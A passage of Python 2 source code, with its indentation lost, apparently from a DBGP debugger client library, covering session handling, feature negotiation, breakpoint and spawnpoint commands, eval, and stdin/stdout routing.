if self._tooltip is None:
value = self.value
if self.numchildren > 0:
# It's a container object - show a map of child items.
values = [""]
tooltip_length = 0
if len(self.childProperties) == 0:
childProps = self.getChildrenNextPage()
else:
childProps = self.childProperties
while childProps:
for child in childProps:
childValue = self.session.propertyValue(child.fullname)
if len(childValue) > self._MAX_VALUE_LEN:
childValue = childValue[:self._MAX_VALUE_LEN] + "..."
child_tooltip = "%s: %s" % (child.name, childValue)
values.append(child_tooltip)
tooltip_length += len(child_tooltip)
if tooltip_length >= maxTooltipLength:
break
if tooltip_length >= maxTooltipLength:
break
# Load another page of children.
childProps = self.getChildrenNextPage()
value = "\n\t".join(values)
if len(value) > maxTooltipLength:
value = value[:maxTooltipLength] + "\n\t..."
if self.type:
self._tooltip = "%s (%s): %s" % (self.name, self.type, value)
else:
self._tooltip = "%s: %s" % (self.name, value)
return self._tooltip
class session(dbgp.serverBase.session):
def __init__(self, sessionHost):
dbgp.serverBase.session.__init__(self, sessionHost)
# setup some event vars
self._resp_cv = threading.Condition()
self._responses = {}
self.statusName = 'stopped'
self.reason = 'ok'
self.applicationId = None
self.threadId = None
self.parentId = None
self.hostname = ""
self._application = None
self._features = {}
self._supportedCommands = {}
self._typeMap = {}
self.supportsAsync = 0
self.supportsHiddenVars = 0
self.supportsPostmortem = 0
self._resume = 0
self.languageName = ''
self.languageVersion = ''
self.maxChildren = 0
self.interactivePrompt = ''
self.interactiveState = 0
def _dispatch(self, size,response):
# THREAD WARNING
# this function is called from the command loop thread. Do
# not do anything here that will result in another command
# being sent to the client, that will result in a lockup
if size != len(response):
raise DBGPError("Data length is not correct %d != %d" % (size,len(response)))
#log.debug(response)
dom = minidom.parseString(response)
root = dom.documentElement
packetType = root.localName
if packetType == 'stream':
type = root.getAttribute('type').lower()
text = ''
nodelist = root.childNodes
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
text = text + node.data
elif node.nodeType == node.CDATA_SECTION_NODE:
# Xdebug sends stdout in a cdata node - bug 77914.
text = text + node.data
text = base64.decodestring(text)
self._application.outputHandler(type, text)
elif packetType == 'response':
command = root.getAttribute('command')
self._responseHandler(root)
if command in ['stop','detach']:
if command == 'stop':
self._application.shutdown()
else:
self._application.releaseSession(self)
try:
if self._socket: # socket may already be closed.
self._socket.close()
finally:
self._socket = None
self._stop = 1
if command in ['run', 'step_into', 'step_over',
'step_out', 'stop', 'detach', 'interact', 'break']:
# any response command can initiate an interactive prompt
# if it includes the prompt and more attributes
if root.hasAttribute('more') and root.hasAttribute('prompt'):
self.interactiveState = int(root.getAttribute('more'))
self.interactivePrompt = root.getAttribute('prompt')
else:
self.interactivePrompt = ''
self.interactiveState = 0
self._resume = 0
# XXX notify state change now
self.stateChange(root)
return
elif packetType == 'notify':
name = root.getAttribute('name').lower()
text = ''
encoding = None
nodelist = root.childNodes
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
text = text + node.data
if root.hasAttribute('encoding'):
encoding = node.getAttribute('encoding')
try:
if text and encoding == 'base64':
text = base64.decodestring(text)
except:
pass
#print "doing notify %s %s" %(name, text)
self.notify(name, text, root)
elif packetType == 'init':
# we need to do some initialization commands, but we
# cannot do that from this thread, which is currently
# the cmdloop thread, because it would cause a deadlock.
# this is a short lived thread, so should be fine
log.debug('starting init thread')
t = threading.Thread(target=self.initFeatures, args=(root,),
name="dbgp initFeatures")
t.setDaemon(True)
t.start()
def initFeatures(self, initNode):
# get our init information
self.applicationId = initNode.getAttribute('appid')
self.threadId = initNode.getAttribute('thread')
self.parentId = initNode.getAttribute('parent')
self.cookie = initNode.getAttribute('session')
self.idekey = initNode.getAttribute('idekey')
# If the client has set a specific hostname setting, then use it,
# else we default to the socket connection address.
if initNode.hasAttribute("hostname"):
self.hostname = initNode.getAttribute('hostname')
else:
self.hostname = self._clientAddr[0]
# we're now in a starting status. force feed this
# so that commands are not queued during startup
self.statusName = 'starting'
if initNode.hasAttribute('interactive'):
self.statusName = 'interactive'
self.interactivePrompt = initNode.getAttribute('interactive')
#log.debug("setting initial interactove prompt to %s", self.interactivePrompt)
# let the world know we're here
if not self._sessionHost.initHandler(self, initNode):
# we've closed the session
return
if initNode.hasAttribute('type') and initNode.getAttribute('type') == 'code_profiling':
# Code profiling data - just ask the client for the profile data.
log.debug("type is 'code_profiling' - so fetching the data")
profile_data = self.getProfileData()
log.debug('len(profile_data): %r', len(profile_data))
self._application.codeProfileHandler(self, profile_data)
self.stop()
return
# gather some necessary information for this session
# any information we need during an async operation needs
# to be retreived prior to async commands being done
# we can ignore the error that is raised when something
# is not supported
log.debug('init thread running')
try:
self.supportsAsync = int(self.featureGet('supports_async'))
except Exception, e:
log.debug('init thread supportsAsync unknown')
if self._stop: return
try:
self.languageName = self.featureGet('language_name')
except Exception, e:
log.debug('init thread languageName unknown')
if self._stop: return
try:
self.languageVersion = self.featureGet('language_version')
except Exception, e:
log.debug('init thread languageVersion unknown')
if self._stop: return
try:
self.maxChildren = int(self.featureGet('max_children'))
except Exception, e:
self.maxChildren = 0
log.debug('init thread maxChildren unknown')
if self._stop: return
try:
self.maxData = int(self.featureGet('max_data'))
except Exception, e:
self.maxData = 0
log.debug('init thread maxData unknown')
if self._stop: return
try:
self.maxDepth = int(self.featureGet('max_depth'))
except Exception, e:
self.maxDepth = 0
log.debug('init thread maxDepth unknown')
if self._stop: return
try:
self.featureGet('show_hidden')
self.supportsHiddenVars = 1
except Exception, e:
self.supportsHiddenVars = 0
log.debug('init supportsHiddenVars false')
if self._stop: return
try:
self.featureGet('supports_postmortem')
self.supportsPostmortem = 1
except Exception, e:
self.supportsPostmortem = 0
log.debug('init supportsPostmortem false')
if self._stop: return
try:
self.featureSet('multiple_sessions', '1')
except Exception, e:
log.debug('init thread multiple_sessions unknown')
if self._stop: return
try:
# let the engine know it can send us notifications
self.featureSet('notify_ok', '1')
except Exception, e:
log.debug('engine does not support notifications')
if self._stop: return
try:
self._supportsOptionalCommand('break')
except Exception, e:
log.debug('init thread break unknown')
if self._stop: return
try:
self._supportsOptionalCommand('eval')
except Exception, e:
log.debug('init thread eval unknown')
if self._stop: return
try:
self._supportsOptionalCommand('stdin')
except Exception, e:
log.debug('init thread stdin unknown')
if self._stop: return
try:
self._supportsOptionalCommand('detach')
except Exception, e:
log.debug('init thread detach unknown')
if self._stop: return
try:
self._supportsOptionalCommand('interact')
except Exception, e:
log.debug('does not support interactive debugger')
if self._stop: return
try:
self.breakpointLanguages = [l.lower() for l in self.featureGet('breakpoint_languages').split(',')]
except Exception, e:
if self._stop: return
self.breakpointLanguages = [self.languageName]
log.debug('init thread breakpoint_languages %r', self.breakpointLanguages)
try:
self._getTypeMap()
except Exception, e:
log.error('unable to retrieve typeMap from client')
if self._stop: return
# pass the url mapping to the engine
try:
if self._supportsOptionalCommand('urimap'):
maps = self._sessionHost.getURIMappings()
for map in maps:
self.featureSet('urimap', map)
except Exception, e:
log.debug('client does not support urimap feature')
if self._stop: return
# grab the breakpoint list now
try:
# some languages, eg. Tcl, have to do some processing before
# breakpoints are set. This notification allows hooks to be
# added for that purpose
if self._application and self._application.sessionCount() == 1:
self._sessionHost.notifyStartup(self, initNode)
err = self._sessionHost.breakpointManager.setSessionBreakpoints(self)
#XXX Should, ideally, show this error to the user somehow. Ideas:
# - pop up a dialog and offer to cancel debugging?
# - status bar message?
# - display the breakpoint/spawnpoint markers slightly
# differently and remember this data so that the properties
# page for the breakpoint shows that this is not set on
# the session
if err:
log.error("the following breakpoints/spawnpoints could not "
"be set on this session:\n%s" % err)
except Exception, e:
log.error('breakpoints failed to be set properly')
pass
if not self._stop:
# are we a new thread in the app? If so, then just do
# the run command now
if self._application and self._application.sessionCount() > 1:
self.resume(RESUME_GO)
# no notifyInit for threads in an app
return
self._sessionHost.notifyInit(self, initNode)
def notify(self, name, text, node):
# "node" is the reponse node from the last continuation command
#
# THREAD WARNING
# this function is called from the command loop thread. Do
# not do anything here that will result in another command
# being sent to the client, that will result in a lockup
# we were running, now we're at a break, or stopping
log.info('session notify %s:%s name %s data %s',
self.applicationId,
self.threadId,
name, text)
def stateChange(self, node):
# "node" is the reponse node from the last continuation command
#
# THREAD WARNING
# this function is called from the command loop thread. Do
# not do anything here that will result in another command
# being sent to the client, that will result in a lockup
# we were running, now we're at a break, or stopping
if node:
self.statusName = node.getAttribute('status')
self.reason = node.getAttribute('reason')
log.info('session %s:%s state %s',
self.applicationId,
self.threadId,
self.statusName)
def addApplication(self, app):
log.debug('setting session application')
self._application = app
def removeApplication(self):
# [TM] Basically this is a poorly named session.finalize().
log.debug('removing session application')
# Tell the breakpoint manager that this debug session is shutting
# down.
self._sessionHost.breakpointManager.releaseSession(self)
# don't remove the application var, just let the thread
# know it should stop.
self._stop = 1
def _responseHandler(self, node):
tid = None
if node.hasAttribute('transaction_id'):
tid = int(node.getAttribute('transaction_id'))
if not tid:
raise DBGPError('response without a transaction id')
self._responses[tid] = node
self._resp_cv.acquire()
self._resp_cv.notify()
self._resp_cv.release()
def sendCommandWait(self, argv, data = None, timeout = 5):
if self._stop:
raise DBGPError('command sent after session stopped')
tid = self.sendCommand(argv, data)
node = self._waitResponse(tid, timeout)
err = node.getElementsByTagName('error')
if err:
errcode = err[0].getAttribute('code')
msgnode = err[0].getElementsByTagName('message')
msg = ''
if msgnode:
for child in msgnode[0].childNodes:
msg = msg + child.nodeValue
if errcode:
errcode = int(errcode)
raise DBGPError(msg, errcode)
return node
def waitResponse(self, tid, timeout=5):
return self._waitResponse(tid, timeout)
def _waitResponse(self, tid, timeout=5):
ticks = 0
while not timeout or ticks < timeout:
if tid in self._responses:
resp = self._responses[tid]
del self._responses[tid]
return resp
# XXX need the timeout here to prevent lockups
# with tcl 11/25/03
#if self._stop:
ticks += 1
self._resp_cv.acquire()
self._resp_cv.wait(1)
self._resp_cv.release()
raise DBGPError('session timed out while waiting for response')
def updateStatus(self):
node = self.sendCommandWait(['status'])
self.statusName = node.getAttribute('status')
self.reason = node.getAttribute('reason')
#/* status values */
#readonly attribute long status;
#readonly attribute long reason;
def getLastError(self):
pass
def getBreakpointLanguages(self):
return self.breakpointLanguages
#/* feature commands */
#wstring featureGet(in wstring name);
def featureGet(self, name):
self._supportsAsync()
node = self.sendCommandWait(['feature_get', '-n', name])
supported = node.getAttribute('supported')
if not supported or not long(supported):
raise DBGPError('Feature %s not supported' % name)
value = ''
for child in node.childNodes:
if child.nodeType in [node.TEXT_NODE, node.CDATA_SECTION_NODE]:
value += child.nodeValue
isBase64 = node.hasAttribute('encoding') and \
node.getAttribute('encoding') == 'base64'
if isBase64:
try:
value = base64.decodestring(value)
except:
pass
return value or 0
#boolean featureSet(in wstring name, in wstring value);
def featureSet(self, name, value):
self._supportsAsync()
node = self.sendCommandWait(['feature_set', '-n', name, '-v', str(value)])
if not node.hasAttribute('success') or not int(node.getAttribute('success')):
raise DBGPError('Unable to set feature %s' % name)
return 1
def _supportsAsync(self):
#if self.supportsAsync is None:
# try:
# node = self.sendCommandWait(['feature_get', '-n', 'supports_async'])
# self.supportsAsync = int(node.getAttribute('supported'))
# except DBGPError, e:
# self.supportsAsync = 0
if not self.supportsAsync and self._resume > 0:
raise DBGPError('Asynchronous commands are not supported')
def _supportsOptionalCommand(self, commandName):
if commandName not in self._supportedCommands:
try:
self.featureGet(commandName)
self._supportedCommands[commandName] = 1
except DBGPError, e:
log.debug("command [%s] is not supported by debugger", commandName)
self._supportedCommands[commandName] = 0
return self._supportedCommands[commandName]
def _noAsync(self, commandName):
# Assert that this command is not being called asychronously (i.e.
# this command is being called in a break state).
if self._resume > 0:
raise DBGPError('Cannot issue command [%s] asynchronously' % commandName)
#/* continuation commands */
#boolean resume(in long resumeAction);
def resume(self, action):
if self._resume > 0:
raise DBGPError('Session already in resume state %d' % self._resume)
# Notify breakpoint manager in case it has queue up
# breakpoint/spawnpoint updates to send on to the session.
self._sessionHost.breakpointManager.sendUpdatesToSession(self)
self._resume = action
self.statusName = 'running'
self.sendCommand([resume_command_names[self._resume]])
# set the status to running
#self.stateChange(None)
return 1
#boolean break();
def breakNow(self):
self._supportsAsync()
self.sendCommand(['break'])
#boolean stop();
def stop(self):
# we cannot wait for a response here, as sometimes apps close
# before we can read the response off the socket.
tid = self.sendCommand(['stop'])
return 1
#boolean detach();
def detach(self):
if not self._supportsOptionalCommand('detach'):
log.debug('client does not support detach!')
return 0
# we cannot wait for a response here, as sometimes apps close
# before we can read the response off the socket.
tid = self.sendCommand(['detach'])
return 1
#wstring interact(in wstring command);
def interact(self, command):
self._supportsAsync()
if not self._supportsOptionalCommand('interact'):
log.debug('client does not support interact!')
return 0
self.statusName = 'running'
# turn off interactive mode. It gets turned on again when we receive
# the response to this command. It needs to be turned off because we
# might recieved stdin requests before we receive an interact response.
# We also must do this before sending the command to avoid the
# response happening before we turn this off (threads, happy happy joy joy)
self.interactivePrompt = ''
if command is None:
tid = self.sendCommand(['interact', '-m', '0'])
else:
tid = self.sendCommand(['interact', '-m', '1'], command.encode('utf-8'))
return tid
#/* stack commands */
#long stackDepth();
def stackDepth(self):
self._noAsync('stack_depth')
node = self.sendCommandWait(['stack_depth'])
return node.getAttribute('depth')
#koIDBGPStackFrame stackGet(in long depth);
def stackGet(self, depth):
self._noAsync('stack_get')
node = self.sendCommandWait(['stack_get', '-d', str(depth)])
for child in node.childNodes:
if child.nodeType != node.ELEMENT_NODE or child.tagName != 'stack': continue
frame = stackFrame()
frame.initWithNode(child)
return frame
return None
#void stackFramesGet([array, size_is(count)] out koIDBGPStackFrame frames,
# out PRUint32 count);
def stackFramesGet(self):
self._noAsync('stack_get')
node = self.sendCommandWait(['stack_get'])
frames = []
children = node.getElementsByTagName('stack')
for child in children:
frame = stackFrame()
frame.initWithNode(child)
frames.append(frame)
return frames
#/* context commands */
#void contextNames([retval, array, size_is(count)] out koIDBGPContextType contextTypes,
# [optional] out PRUint32 count);
def contextNames(self):
self._noAsync('context_names')
node = self.sendCommandWait(['context_names'])
contextList = []
children = node.getElementsByTagName('context')
for child in children:
context = contextType()
context.initWithNode(child)
contextList.append(context)
return contextList
#void contextGet(in long id,
# [array, size_is(count)] out koIDBGPProperty properties,
# out PRUint32 count);
def contextGet(self, contextId, depth):
self._noAsync('context_get')
# Need a long timeout since at least Google Chrome takes a while to send
# back global variables.
node = self.sendCommandWait(['context_get', '-c', str(contextId), '-d', str(depth)], timeout=30)
propertyList = []
for child in node.childNodes:
if child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'property':
p = property()
p.initWithNode(self, child, contextId, depth)
propertyList.append(p)
return propertyList
#/* property commands */
#koIDBGPProperty propertyGet(in long contextId,
# in long stackDepth,
# in wstring fullname,
# in long maxData,
# in long dataType,
# in long dataPage);
def propertyGet(self, fullname):
return self.propertyGetEx(0, 0, fullname, 0, '', 0)
def propertyGetEx(self, contextId, stackDepth, fullname, maxData, dataType, dataPage, address=""):
# This can fire with a hover tip while the program is running, so
# ignore it.
if self._resume > 0:
return
cmd = ['property_get', '-c', str(contextId),
'-d', str(stackDepth), '-n', fullname]
if maxData:
cmd += ['-m', str(maxData)]
if dataType:
cmd += ['-t', dataType]
if dataPage:
cmd += ['-p', str(dataPage)]
if address and len(address) > 0:
cmd += ['-a', str(address)]
try:
node = self.sendCommandWait(cmd)
p = property()
p.initWithNode(self, node.firstChild, contextId, stackDepth)
except DBGPError, e:
# create an empty var with the exception for the value
p = property()
p.session = self
p.context = contextId
p.depth = stackDepth
p.fullname = fullname
p.name = fullname
p.value = getErrorInfo(e)[1]
p.type = 'exception'
return p
#koIDBGPProperty propertySet(in long contextId,
# in long stackDepth,
# in wstring name,
# in wstring value);
def propertySet(self, name, value):
return self.propertySetEx(0, 0, name, value)
def propertySetEx(self, contextId, stackDepth, name, value):
self._noAsync('property_set')
args = ['property_set', '-c', str(contextId), '-d',
str(stackDepth), '-n', name]
node = self.sendCommandWait(args, value)
if node.hasAttribute('success'):
if int(node.getAttribute('success')):
return self.propertyGetEx(contextId, stackDepth, name, 0, '', 0)
else:
raise DBGPError("Unable to set the property value.")
return None
def propertyUpdate(self, prop, value, type):
self._noAsync('property_set')
args = ['property_set', '-c', str(prop.contextId), '-d',
str(prop.depth), '-n', prop.fullname]
if prop.key:
args += ['-k', prop.key]
if prop.address:
prop_address = prop.address
args += ['-a', prop_address]
else:
prop_address = ""
if type:
args += ['-t', type]
node = self.sendCommandWait(args, value)
if node.hasAttribute('success'):
if int(node.getAttribute('success')):
return self.propertyGetEx(prop.contextId, prop.depth, prop.fullname, 0, '', 0, prop_address)
else:
raise DBGPError("Unable to update the variable.")
return None
#wstring propertyValue(in long contextId,
# in long stackDepth,
# in wstring name);
def propertyValue(self, name):
return self.propertyValueEx(0, 0, name)
def propertyValueEx(self, contextId, stackDepth, name):
self._noAsync('property_value')
args = ['property_value', '-c', str(contextId), '-d',
str(stackDepth), '-n', name]
node = self.sendCommandWait(args)
encoding = None
if node.hasAttribute('encoding'):
encoding = node.getAttribute('encoding')
value = ''
# we may have more than one text node, get them all
for child in node.childNodes:
if child.nodeType in [minidom.Node.TEXT_NODE,
minidom.Node.CDATA_SECTION_NODE]:
value = value + child.nodeValue
try:
if value and encoding == 'base64':
value = base64.decodestring(value)
except:
pass
return value
#---- breakpoint commands
def breakpointSet(self, bp):
"""Set the given breakpoint on this session.
Returns the session's assigned ID (a string) for the new breakpoint.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointSet(bp='%s')", bp.getName())
self._supportsAsync()
bpargs, bpdata = bp.getSetArgs()
args = ["breakpoint_set"] + bpargs
node = self.sendCommandWait(args, bpdata)
return node.getAttribute("id")
def breakpointUpdate(self, bpid, bp, attrs=None):
"""Update the given breakpoint.
"bpid" is the session's ID for this breakpoint.
"bp" is a breakpoint instance from which to update
"attrs" (optional) is a list of attributes that are meant to be
updated. If None (or the empty list), then all attributes
are updated.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointUpdate(bpid=%r, bp='%s', attrs=%r)",
bpid, bp.getName(), attrs)
self._supportsAsync()
args = ["breakpoint_update", "-d", str(bpid)]
if not attrs: # False means update all supported attributes.
args += ["-s", bp.state]
args += ["-n", str(bp.lineno)]
args += ["-h", str(bp.hitValue)]
if bp.hitCondition:
args += ["-o", bp.hitCondition]
args += ["-r", str(int(bp.temporary))]
else: # Only update the specified attributes.
for attr in attrs:
if attr == "state":
args += ["-s", bp.state]
elif attr == "lineno":
args += ["-n", str(bp.lineno)]
elif attr == "hitValue":
args += ["-h", str(bp.hitValue)]
elif attr == "hitCondition":
args += ["-o", bp.hitCondition]
elif attr == "temporary":
args += ["-r", str(int(bp.temporary))]
if bp.type in 'conditional':
bpdata = bp.expression
else:
bpdata = None
bplog.debug("session %r: '%r', data='%r'", (self.applicationId, self.threadId), args, bpdata)
node = self.sendCommandWait(args, bpdata)
def breakpointGet(self, bpid):
"""Get the breakpoint with the given session breakpoint id.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointGet(bpid=%r)", bpid)
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_get", "-d", str(bpid)])
children = node.getElementsByTagName("breakpoint")
if not children:
return None
bp = breakpoint()
bp.initWithNode(children[0])
return bp
def breakpointEnable(self, bpid):
"""Enable the breakpoint with the given session breakpoint id.
NOTE: This command is OBSOLETE. Use breakpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointEnable(bpid=%r)", bpid)
self._supportsAsync()
self.sendCommandWait(["breakpoint_enable", "-d", str(bpid)])
def breakpointDisable(self, bpid):
"""Disable the breakpoint with the given session breakpoint id.
NOTE: This command is OBSOLETE. Use breakpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointDisable(bpid=%r)", bpid)
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_disable", "-d", str(bpid)])
def breakpointRemove(self, bpid):
"""Remove the breakpoint with the given session breakpoint id.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointRemove(bpid=%r)", bpid)
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_remove", "-d", str(bpid)])
def breakpointList(self):
"""Return a list of all breakpoints for this session.
Raises a DBGPError if the command fails.
"""
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_list"])
children = node.getElementsByTagName("breakpoint")
breakpoints = []
for child in children:
bp = breakpoint()
bp.initWithNode(child)
breakpoints.append(bp)
return breakpoints
#---- spawnpoint commands
def spawnpointSet(self, sp):
"""Set the given spawnpoint on this session.
Returns the session's assigned ID (a string) for the new spawnpoint.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_set")
spArgs, spData = sp.getSetArgs()
args = ["spawnpoint_set"] + spArgs
node = self.sendCommandWait(args, spData)
return node.getAttribute("id")
def spawnpointUpdate(self, spid, sp, attrs=None):
"""Update the given spawnpoint.
"spid" is the session's ID for this spawnpoint.
"sp" is a spawnpoint instance from which to update
"attrs" (optional) is a list of attributes that are meant to be
updated. If None, then all attributes are updated.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_update")
args = ["spawnpoint_update", "-d", spid]
if attrs is None: # None means update all supported attributes.
args += ["-s", str(sp.state)]
args += ["-n", str(sp.lineno)]
else: # Only update the specified attributes.
for attr in attrs:
if attr == "state":
args += ["-s", str(sp.state)]
elif attr == "lineno":
args += ["-n", str(sp.lineno)]
node = self.sendCommandWait(args)
def spawnpointGet(self, spid):
"""Get the spawnpoint with the given session spawnpoint id.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_get")
node = self.sendCommandWait(["spawnpoint_get", "-d", str(spid)])
children = node.getElementsByTagName("spawnpoint")
if not children:
return None
sp = spawnpoint()
sp.initWithNode(children[0])
return sp
def spawnpointEnable(self, spid):
"""Enable the spawnpoint with the given session spawnpoint id.
NOTE: This command is OBSOLETE. Use spawnpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_enable")
self.sendCommandWait(["spawnpoint_enable", "-d", str(spid)])
def spawnpointDisable(self, spid):
"""Disable the spawnpoint with the given session spawnpoint id.
NOTE: This command is OBSOLETE. Use spawnpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_disable")
node = self.sendCommandWait(["spawnpoint_disable", "-d", str(spid)])
def spawnpointRemove(self, spid):
"""Remove the spawnpoint with the given session spawnpoint id.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_remove")
node = self.sendCommandWait(["spawnpoint_remove", "-d", str(spid)])
def spawnpointList(self):
"""Return a list of all spawnpoints for this session.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_list")
node = self.sendCommandWait(["spawnpoint_list"])
children = node.getElementsByTagName("spawnpoint")
spawnpoints = []
for child in children:
sp = spawnpoint()
sp.initWithNode(child)
spawnpoints.append(sp)
return spawnpoints
#/* eval */
#koIDBGPProperty evalString(in wstring expression);
def evalString(self, expression):
self._noAsync('eval')
l = len(expression)
try:
node = self.sendCommandWait(['eval', '-l', str(l)], expression)
pnodes = node.getElementsByTagName('property')
if pnodes:
p = property()
p.initWithNode(self, pnodes[0])
p.name = expression
return p
except DBGPError, e:
# create an empty var with the exception for the value
p = property()
p.session = self
p.context = 0
p.depth = 0
p.fullname = expression
p.name = expression
p.value = getErrorInfo(e)[1]
p.type = 'exception'
return p
return None
def _getTypeMap(self):
self._noAsync('typemap_get')
node = self.sendCommandWait(['typemap_get'])
self._typeMap = {}
children = node.getElementsByTagName('map')
for child in children:
typ = dataType()
typ.initWithNode(child)
self._typeMap[typ.languageType] = typ
#void getTypeMap([array, size_is(count)] out koIDBGPDataType dateTypes,
# out PRUint32 count);
def getTypeMap(self):
if not self._typeMap:
self._getTypeMap()
return self._typeMap.values()
def getDataType(self, commonType):
for typ in self.getTypeMap():
if typ.commonType == commonType:
return typ
return None
## Gets the sourcecode for the named file.
#wstring getSourceCode(in wstring filename);
def getSourceCode(self, filename, startline, endline):
self._noAsync('source')
cmd = ['source']
if filename:
cmd += ['-f', filename]
if startline:
cmd += ['-b', str(startline)]
if endline:
cmd += ['-e', str(endline)]
node = self.sendCommandWait(cmd)
text = ''
for c in node.childNodes:
text = text + c.nodeValue
try:
text = base64.decodestring(text)
except:
pass
return text
def getProfileData(self):
self._noAsync('profile_data')
cmd = ['profile_data']
node = self.sendCommandWait(cmd)
text = ''
for c in node.childNodes:
text = text + c.nodeValue
try:
text = base64.decodestring(text)
except:
pass
if node.hasAttribute('datatype') and \
node.getAttribute('datatype') == 'zip':
# The profile information is wrapped inside a zip archive.
try:
from zipfile import ZipFile
from cStringIO import StringIO
zipfile = StringIO(text)
z = ZipFile(zipfile)
assert len(z.filelist) == 1
filename = z.filelist[0]
text = z.read(filename)
except:
# TODO: Properly handle and notify any errors.
pass
return text
#sendStdin(in wstring data, in long size);
def sendStdin(self, data, size):
if not self._supportsOptionalCommand('stdin'):
log.debug('client does not support stdin!')
return 0
log.debug('sending stdin [%s]!', data)
node = self.sendCommandWait(['stdin'], data)
return node.getAttribute('success')
#setStdinHandler(in koIFile file);
def setStdinHandler(self, file):
if not self._supportsOptionalCommand('stdin'):
log.debug('client does not support stdin!')
return 0
if file:
cmd = ['stdin', '-c', '1']
else:
cmd = ['stdin', '-c', '0']
node = self.sendCommandWait(cmd)
return node.getAttribute('success')
#setStdoutHandler(in koIFile file, in long mode);
def setStdoutHandler(self, file, mode):
node = self.sendCommandWait(['stdout', '-c', str(mode)])
return node.getAttribute('success')
#setStderrHandler(in koIFile file, in long mode);
def setStderrHandler(self, file, mode):
node = self.sendCommandWait(['stderr', '-c', str(mode)])
return node.getAttribute('success')
def _sessionSort(a, b):
return cmp(a.threadId, b.threadId)
class application:
def __init__(self, appMgr):
self.appMgr = appMgr
self._watchedvars = {}
self._sessions = {}
self.currentSession = None
self._stdin = self._stdout = self._stderr = None
def addSession(self, session):
log.debug('pid %r adding thread %r', session.applicationId, session.threadId)
self._sessions[session.threadId] = session
session.addApplication(self)
if not self.currentSession:
self.currentSession = session
def haveSession(self, session):
return session in self._sessions.values()
def releaseSession(self, session):
log.debug('removing session')
session.removeApplication()
del self._sessions[session.threadId]
# reset current thread now or quit
if len(self._sessions) < 1:
self.shutdown()
return
if session == self.currentSession:
self.currentSession = self._sessions.values()[0]
def getSessionList(self):
l = self._sessions.values()
l.sort(_sessionSort)
return l
def shutdown(self):
if self._stdin:
self._stdin.close()
for ses in self._sessions.keys():
self._sessions[ses].removeApplication()
if self._sessions.has_key(ses):
del self._sessions[ses]
self.appMgr.releaseApplication(self)
def sessionCount(self):
return len(self._sessions.keys())
#sendStdin(in wstring data, in long size);
def sendStdin(self, data, size):
return self.currentSession.sendStdin(data, size);
#setStdinHandler(in koIFile file);
def setStdinHandler(self, file):
# XXX need to set for all sessions?
ok = self.currentSession.setStdinHandler(file)
if ok:
self._stdin = file
t = threading.Thread(target=self._stdinHandlerThread,
name="dbgp stdinHandler")
t.setDaemon(True)
t.start()
return ok
def _stdinHandlerThread(self):
log.debug('starting stdin thread')
while 1:
try:
#log.debug('reading console data...')
data = self._stdin.read(1024)
if not data:
self.currentSession.setStdinHandler(None)
log.debug('empty data from console, stdin closed')
break
log.debug('writing stdin data...[%s]', data)
self.sendStdin(data, len(data))
except Exception, e:
log.exception(e)
break
log.debug('quiting stdin thread')
#setStdoutHandler(in koIFile file, in long mode);
def setStdoutHandler(self, file, mode):
# XXX need to set for all sessions?
ok = self.currentSession.setStdoutHandler(file, mode)
if ok:
self._stdout = file
return ok
#setStderrHandler(in koIFile file, in long mode);
def setStderrHandler(self, file, mode):
# XXX need to set for all sessions?
ok = self.currentSession.setStderrHandler(file, mode)
if ok:
self._stderr = file
return ok
def outputHandler(self, stream, text):
log.debug('outputHandler [%r] [%r]', stream, text)
if stream == 'stdout' and self._stdout:
self._stdout.write(text)
elif stream == 'stderr' and self._stderr:
self._stderr.write(text)
class appManager:
appList = {}
_lock = threading.Lock()
def __init__(self, debugMgr):
self.debugMgr = debugMgr
def getApplication(self, session):
self._lock.acquire()
try:
if session.applicationId not in self.appList:
log.debug('creating application class for pid %r',session.applicationId)
self.appList[session.applicationId] = application(self)
else:
log.debug('getting application class for pid %r',session.applicationId)
if not self.appList[session.applicationId].haveSession(session):
self.appList[session.applicationId].addSession(session)
finally:
self._lock.release()
return self.appList[session.applicationId]
def releaseApplication(self, appinst):
# kill command was issued, remove all references
appid = appinst.currentSession.applicationId
self._lock.acquire()
try:
if appid not in self.appList:
# XXX raise exception?
return
data = self.appList[appid]
del self.appList[appid]
finally:
self._lock.release()
def shutdown(self):
for app in self.appList.values():
app.shutdown()
class listener(dbgp.serverBase.listener):
def startNewSession(self, client, addr):
# start a new thread that is the host connection
# for this debugger session
sessionHost = session(self._session_host)
sessionHost.start(client, addr)
class breakpointManager:
_lock = threading.Lock()
_breakpoints = {} # mapping of breakpoint guid to breakpoint instance
def __init__(self):
self._guidCounter = 0 # used to assign a unique self._id to each bp
# Keep track of what debug sessions have what breakpoints and what
# ids they have assigned for them. Essentially this information is
# a cache because _technically_ we could query every debug session
# for this info every time.
# - Note: A session id is defined here as the 2-tuple
# (session.applicationId, session.threadId)
# because I [TrentM] am not sure if threadId's are necessarily
# unique across application's.
self._allSessionBPIDs = {
# <session id>: {<breakpoint guid>: <session bpid>, ...}
}
self._queuedSessionCommands = {
# <session id>: <FIFO of commands to send on break state>
# where each "command" is a 2-tuple:
# (<set|remove|update>, <tuple of args>)
# e.g.:
# ("set", (<breakpoint instance>,))
# ("remove", (<breakpoint instance>,))
# ("update", (<breakpoint instance>, <attrs to update>))
}
self._sessions = {
# <session id>: <session instance>
}
def _makeBreakpointGuid(self):
guid = self._guidCounter
self._guidCounter += 1
return guid
